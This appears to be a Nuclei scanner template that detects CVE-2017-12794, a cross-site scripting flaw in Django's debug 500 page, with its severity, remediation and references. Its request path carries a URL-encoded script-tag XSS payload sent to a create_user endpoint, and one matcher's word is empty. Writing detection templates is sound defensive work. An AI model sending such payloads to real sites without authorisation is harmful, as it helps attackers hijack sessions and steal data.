id: CVE-2017-12794 info: name: Django Debug Page - Cross-Site Scripting author: pikpikcu severity: medium description: | Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project. reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 epss-percentile: 0.59827 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject product: django tags: cve2017,cve,xss,django,djangoproject http: - method: GET path: - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a00463044022045d37d6d95dbcf0d99b3dd98b0548af3f80775282906963e91de53ddd88178e102207fef1b1e81deb1e461760619d1398e0d670d6ad1cb6109983598f16783a68676:922c64590222798bb761d5b6d8e72950